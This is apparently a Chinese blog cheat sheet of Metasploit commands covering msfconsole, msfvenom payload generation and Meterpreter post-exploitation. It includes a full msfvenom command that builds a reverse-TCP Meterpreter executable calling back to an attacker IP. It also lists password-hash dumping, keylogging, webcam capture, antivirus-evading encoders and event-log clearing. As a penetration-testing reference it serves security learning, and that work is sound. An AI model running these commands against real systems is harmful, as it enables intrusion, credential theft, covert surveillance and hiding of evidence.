MSF常用控制命令

MSF(Metasploit Framework)的命令体系较为庞大,主要可以分为三个部分:msfconsole 控制台命令、msfvenom 载荷生成命令以及 Meterpreter 会话命令。

🖥️ msfconsole 控制台命令

这是在 Metasploit 框架主界面中使用的命令,用于查找、配置和执行攻击模块。

模块管理与执行
  • search : 搜索模块。可以根据名称、CVE编号、类型等关键词查找。
    • 示例:search eternalbluesearch cve:2024 type:exploit
  • use : 加载指定的模块。
    • 示例:use exploit/windows/smb/ms17_010_eternalblue
  • info: 显示当前或指定模块的详细信息。
  • show : 显示各类信息,常用子命令有:
    • show options: 查看当前模块需要配置的参数(标有 yes 的为必填项)。
    • show payloads: 查看当前模块支持的攻击载荷(Payload)。
    • show targets: 查看当前模块支持的目标系统。
    • show exploits: 查看所有渗透攻击模块。
    • show auxiliary: 查看所有辅助模块。
  • set : 为模块参数赋值。
    • 示例:set RHOSTS 192.168.1.100 (设置目标IP)
    • 示例:set LHOST 192.168.1.101 (设置本地监听IP)
  • exploit / run: 执行当前加载的模块,两者功能相同。
  • back: 退出当前模块,返回上一级菜单。
  • exit / quit : 完全退出 msfconsole
会话管理

当攻击成功后,会使用会话(Session)命令来管理已获取的权限。

  • sessions: 查看所有活跃的会话列表。
  • sessions -i <id>: 与指定ID的会话进行交互,例如进入 Meterpreter 命令行。
  • sessions -k <id>: 终止指定ID的会话。
  • background : 将当前会话置于后台运行,可以返回 msfconsole 主界面。
数据库操作
  • msfdb init: 初始化 Metasploit 的 PostgreSQL 数据库。
  • db_status: 检查数据库连接状态。
  • db_nmap: 调用 Nmap 进行扫描,并将结果自动存入数据库。
  • hosts: 列出数据库中记录的所有主机。
  • workspace: 管理工作区,用于隔离不同项目的数据。

🛠️ msfvenom 载荷生成命令

msfvenom 是一个独立的命令行工具,用于生成和编码 Payload(攻击载荷),例如可执行文件、脚本等。它不属于 msfconsole 内部命令。

  • 基本语法 :
    msfvenom -p <payload> <options> -f <format> -o <output_file>

  • 常用参数:

    • -p, --payload: 指定要使用的 Payload。
    • -f, --format: 指定输出格式(如 exe, elf, php 等)。
    • -o, --out: 指定输出文件的路径。
    • -e, --encoder: 指定编码器,用于绕过杀毒软件。
    • LHOST: 本地主机IP,即攻击者的IP。
    • LPORT: 本地监听端口。
  • 示例: 生成一个 Windows 系统的反向 TCP 连接 Payload。

    bash

    复制代码
    1msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o shell.exe

🎯 Meterpreter 会话命令

Meterpreter 是 MSF 功能最强大的 Payload 之一,成功连接后会进入一个交互式命令行环境,提供丰富的后渗透攻击功能。

系统操作
  • sysinfo: 获取目标系统的详细信息(操作系统、计算机名等)。
  • getuid: 查看当前 Meterpreter 会话的运行用户权限。
  • getsystem: 尝试将权限提升至 SYSTEM 级别(通常需要管理员权限)。
  • ps: 列出目标系统上的所有进程。
  • migrate <pid>: 将 Meterpreter 会话迁移到指定 PID 的进程中,以维持权限。
  • shell: 切换到目标系统的原生命令行(如 Windows 的 cmd)。
  • reboot / shutdown: 重启或关闭目标计算机。
文件系统操作
  • ls / pwd: 列出目录/显示当前路径。
  • cd: 切换目录。
  • download: 从目标机下载文件到攻击机。
  • upload: 从攻击机上传文件到目标机。
  • cat: 读取文件内容。
  • rm / del: 删除文件。
  • mkdir: 创建目录。
信息搜集与后渗透
  • hashdump: 转储 SAM 数据库,获取用户密码哈希值。

  • screenshot: 截取目标机当前桌面屏幕。

  • keyscan_start: 开始记录键盘击键。

  • keyscan_dump: 转储已记录的击键内容。

  • keyscan_stop: 停止键盘记录。

  • webcam_list: 列出目标机的摄像头。

  • webcam_snap: 使用摄像头拍照。

  • run : 执行 Meterpreter 脚本或后渗透模块,如 run scraper (搜集信息)、run post/windows/manage/enable_rdp (开启远程桌面)。

  • clearev : 清除目标机的事件日志。

    00:42

    一天一个网安技术,今天学习MSF远程控制手机


    网络安全教学中心

    01:30

    一分钟教你实现MSF远控手机(仅供网络安全技术学习)


    网络安全-老白

相关推荐
kang0x02 小时前
Simple XOR - Writeup by AI
安全
小小工匠2 小时前
Spring AI RAG - 06 敏感词过滤与内容安全防护
人工智能·安全·spring
一切皆是因缘际会3 小时前
AI技术新风口:边缘计算与智能体协同,解锁产业落地新范式
大数据·人工智能·安全·ai·架构·语音识别
JiaWen技术圈3 小时前
网站开发中登录与注册安全防范完整指南
安全
mzhan0174 小时前
Linux: config: CRYPTO_USER_API_AEAD
linux·安全·module
想你依然心痛4 小时前
HarmonyOS 6(API 23)实战:基于悬浮导航、沉浸光感与HMAF的“代码哨兵“——AI智能体代码安全审计平台
人工智能·安全·harmonyos·智能体
ze^05 小时前
Day01 Web应用&架构搭建&域名源码&站库分离&MVC模型&解析受限&对应路径
安全·web安全·架构·mvc·安全架构
轻口味5 小时前
HarmonyOS 6.1 全栈实战录 - 09 极光底座:ArkWeb 6.1 性能、安全与视觉插帧全特性深度实战
pytorch·安全·harmonyos
Paranoid-up5 小时前
安全启动和安全固件更新(SBSFU)11:保护链:开发 / 量产 / SECURE_LOCK 三种模式
安全·iap·安全启动·安全升级·sbsfu
TOWE technology6 小时前
同为科技雷电防护产品,构筑全场景电气安全防线
网络·科技·安全·防雷产品·防雷工程·防雷施工·防雷设计